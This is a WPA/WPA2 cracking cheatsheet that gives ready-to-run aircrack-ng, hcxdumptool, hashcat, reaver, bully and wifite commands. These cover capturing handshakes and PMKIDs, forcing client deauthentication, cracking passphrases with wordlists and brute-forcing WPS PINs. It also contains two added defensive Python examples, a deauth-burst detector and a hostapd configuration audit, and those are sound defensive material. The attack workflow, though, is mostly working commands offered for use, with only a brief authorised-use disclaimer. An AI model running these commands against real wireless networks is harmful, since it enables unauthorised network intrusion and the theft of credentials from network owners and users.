WPA/WPA2 Cracking Cheatsheet
Command workflow for the aircrack-ng suite and modern hcxtools. Use only against networks you own or are authorised to test. Values in angle brackets (<BSSID>, <CH>, <CLIENT_MAC>) are placeholders to fill in from your own scan; the interface name (wlan0 / wlan0mon) will also vary by driver.
1. Monitor mode
sudo airmon-ng check kill # stop NetworkManager/wpa_supplicant
sudo airmon-ng start wlan0 # creates wlan0mon
iw dev # confirm monitor interface
2. Discover networks and clients
sudo airodump-ng wlan0mon # note target BSSID, CH, and connected STATION
3. Capture the WPA handshake
# lock onto the target channel and write a capture file
sudo airodump-ng -c <CH> --bssid <BSSID> -w capture wlan0mon
# in a second terminal, deauth a client to force a reconnect (handshake)
sudo aireplay-ng -0 5 -a <BSSID> -c <CLIENT_MAC> wlan0mon
# look for "WPA handshake: <BSSID>" in the airodump header
4. Crack with aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> capture-01.cap
5. Faster path with hashcat (recommended)
# capture directly to PMKID/handshake (no client needed for PMKID)
sudo hcxdumptool -i wlan0mon -o dump.pcapng
# convert to hashcat 22000 format
hcxpcapngtool -o hash.22000 dump.pcapng
# crack (mode 22000 = WPA-PBKDF2-PMKID+EAPOL)
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt
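Added detection example (not part of this cheatsheet or of the aircrack-ng/hcxtools projects): the forced reconnect in step 3 shows up on the air as a burst of deauth frames carrying the AP's own address, and that burst is what a monitor-mode wireless IDS sensor alerts on. The frame records, BSSIDs and client MAC below are constructed; the window and threshold values and the function names are assumptions for the example.

```python
"""Deauthentication-burst detector for a monitor-mode sensor.

Added example, not part of the original cheatsheet or the aircrack-ng suite:
the forced reconnect in step 3 appears on the air as a burst of deauth frames
that carry the AP's own address, and that is the signature a wireless IDS
looks for.  Frame records below are constructed for this example; a real
sensor would fill them from decoded 802.11 management frames.
"""
from collections import defaultdict, deque

WINDOW_S = 10.0     # sliding window length in seconds (assumed tuning value)
THRESHOLD = 5       # disconnect frames per BSSID inside one window that raise an alert
DISCONNECT_SUBTYPES = {"deauth", "disassoc"}   # management frames that tear down an association


def detect_deauth_bursts(frames, window_s=WINDOW_S, threshold=THRESHOLD):
    """Return one alert per BSSID, the first time its disconnect-frame rate crosses threshold.

    frames: iterable of dicts with keys ts (seconds, ascending order), subtype,
    bssid, src and dst.  Only frames that claim to come from the AP itself
    (src == bssid) are counted; that is the form a spoofed "-a <BSSID>" deauth takes.
    """
    recent = defaultdict(deque)     # bssid -> timestamps of its recent disconnect frames
    targets = defaultdict(set)      # bssid -> stations those frames were aimed at
    alerted = set()
    alerts = []
    for f in frames:
        if f["subtype"] not in DISCONNECT_SUBTYPES or f["src"] != f["bssid"]:
            continue
        q = recent[f["bssid"]]
        q.append(f["ts"])
        targets[f["bssid"]].add(f["dst"])
        while q and f["ts"] - q[0] > window_s:   # expire timestamps that left the window
            q.popleft()
        if len(q) >= threshold and f["bssid"] not in alerted:
            alerted.add(f["bssid"])
            alerts.append({
                "bssid": f["bssid"],
                "count": len(q),
                "window": (q[0], f["ts"]),
                "targets": sorted(targets[f["bssid"]]),
            })
    return alerts


# Constructed sample: one benign disconnect on AP2, then a 5-frame burst on AP1
# aimed at a single client, followed by that client re-authenticating.
AP1, AP2 = "02:11:22:33:44:01", "02:11:22:33:44:02"   # constructed BSSIDs
STA = "02:aa:bb:cc:dd:01"                              # constructed client MAC
BCAST = "ff:ff:ff:ff:ff:ff"

SAMPLE_FRAMES = [
    {"ts": 0.0,  "subtype": "beacon",   "bssid": AP1, "src": AP1, "dst": BCAST},
    {"ts": 0.4,  "subtype": "disassoc", "bssid": AP2, "src": AP2, "dst": STA},   # ordinary single disconnect
    {"ts": 1.0,  "subtype": "deauth",   "bssid": AP1, "src": AP1, "dst": STA},   # burst starts
    {"ts": 1.1,  "subtype": "deauth",   "bssid": AP1, "src": AP1, "dst": STA},
    {"ts": 1.2,  "subtype": "deauth",   "bssid": AP1, "src": AP1, "dst": STA},
    {"ts": 1.3,  "subtype": "deauth",   "bssid": AP1, "src": AP1, "dst": STA},
    {"ts": 1.4,  "subtype": "deauth",   "bssid": AP1, "src": AP1, "dst": STA},   # fifth frame crosses THRESHOLD
    {"ts": 2.0,  "subtype": "auth",     "bssid": AP1, "src": STA, "dst": AP1},   # client comes back: the 4-way handshake follows
    {"ts": 30.0, "subtype": "deauth",   "bssid": AP2, "src": AP2, "dst": STA},   # isolated, outside any window
]


def run_sample():
    """Run the detector over the constructed frames and return its alerts."""
    return detect_deauth_bursts(SAMPLE_FRAMES)


if __name__ == "__main__":
    for a in run_sample():
        print(f"ALERT bssid={a['bssid']} deauth/disassoc={a['count']} "
              f"in {a['window'][1] - a['window'][0]:.1f}s towards {', '.join(a['targets'])}")
```

The sample raises exactly one alert, for AP1, at the fifth frame of the burst; the lone disconnects on AP2 stay below the threshold. The corresponding mitigation is Protected Management Frames (802.11w): with PMF required, clients discard deauth and disassoc frames that are not integrity-protected, so the forced reconnect does not happen, although the sensor still sees the spoofed frames on the air and can alert on them.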
WPS attacks
wash -i wlan0mon # list WPS-enabled APs
reaver -i wlan0mon -b <BSSID> -vv # online PIN brute force
bully wlan0mon -b <BSSID> -v 3 # alternative WPS attacker
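Added hardening example (not part of this cheatsheet or of hostapd): an audit of a hostapd configuration for the settings that make the WPS attacks above and the offline handshake/PMKID cracking possible, with a weak configuration beside a hardened one that passes the same check. Both configuration texts are constructed; the MIN_PASSPHRASE_LEN policy value and the function names are assumptions, while the configuration keys themselves (wpa, wpa_key_mgmt, ieee80211w, wps_state, sae_password, sae_require_mfp) are real hostapd options.

```python
"""hostapd configuration audit for the weaknesses the cheatsheet's tools rely on.

Added example, not part of the original cheatsheet or of hostapd: it parses a
hostapd.conf, flags the settings that make WPS PIN brute force and offline
handshake/PMKID cracking possible, and shows a hardened configuration that
passes the same check.  Both configuration texts are constructed; the
MIN_PASSPHRASE_LEN policy value is an assumption.
"""

MIN_PASSPHRASE_LEN = 16   # assumed local policy; 802.11 only requires 8 characters


def parse_hostapd(text):
    """Parse key=value lines of a hostapd.conf into a dict (comments and blanks skipped)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_hostapd(text):
    """Return the list of finding ids for one hostapd.conf, empty if it is clean."""
    c = parse_hostapd(text)
    findings = []
    wpa = int(c.get("wpa", "0"))                          # bit 1 = WPA(1), bit 2 = WPA2/RSN
    key_mgmt = c.get("wpa_key_mgmt", "WPA-PSK").split()   # hostapd defaults to WPA-PSK
    if wpa & 1:
        findings.append("wpa1-enabled")
    if "TKIP" in c.get("wpa_pairwise", "") or "TKIP" in c.get("rsn_pairwise", ""):
        findings.append("tkip-allowed")
    if "WPA-PSK" in key_mgmt:            # 4-way handshake / PMKID can be captured and cracked offline
        findings.append("psk-offline-crackable")
    if c.get("ieee80211w", "0") != "2":  # PMF not required: spoofed deauth frames are accepted
        findings.append("pmf-not-required")
    if c.get("wps_state", "0") != "0":   # WPS registrar active: PIN brute force is possible
        findings.append("wps-enabled")
    passphrase = c.get("wpa_passphrase")
    if passphrase is not None and len(passphrase) < MIN_PASSPHRASE_LEN:
        findings.append("short-passphrase")
    return findings


# Constructed: a typical vulnerable guest-AP configuration.
WEAK_CONF = """\
interface=wlan0
ssid=GuestWiFi
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
rsn_pairwise=CCMP
wpa_passphrase=summer2024
ieee80211w=0
wps_state=2
"""

# Constructed: the same AP moved to WPA3-SAE with PMF required and WPS off.
HARDENED_CONF = """\
interface=wlan0
ssid=GuestWiFi
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
sae_password=correct-horse-battery-staple-guest-2024-xyz
ieee80211w=2
sae_require_mfp=1
wps_state=0
"""


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit_hostapd(conf) or 'no findings'}")
```

The weak configuration produces six findings; the hardened one produces none. A WPA2/WPA3 transition configuration (wpa_key_mgmt=WPA-PSK SAE) still reports psk-offline-crackable, because legacy clients can still complete the PSK handshake that aircrack-ng and hashcat work from, so the passphrase length and PMF settings remain important until SAE-only is possible.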
Automated (Wifite)
sudo wifite # auto handshake/PMKID/WPS against nearby APs
Cleanup
sudo airmon-ng stop wlan0mon
sudo systemctl start NetworkManager
References
- Aircrack-ng documentation: https://www.aircrack-ng.org/documentation.html
- hashcat mode 22000 (WPA): https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
- hcxtools (hcxdumptool / hcxpcapngtool): https://github.com/ZerBea/hcxtools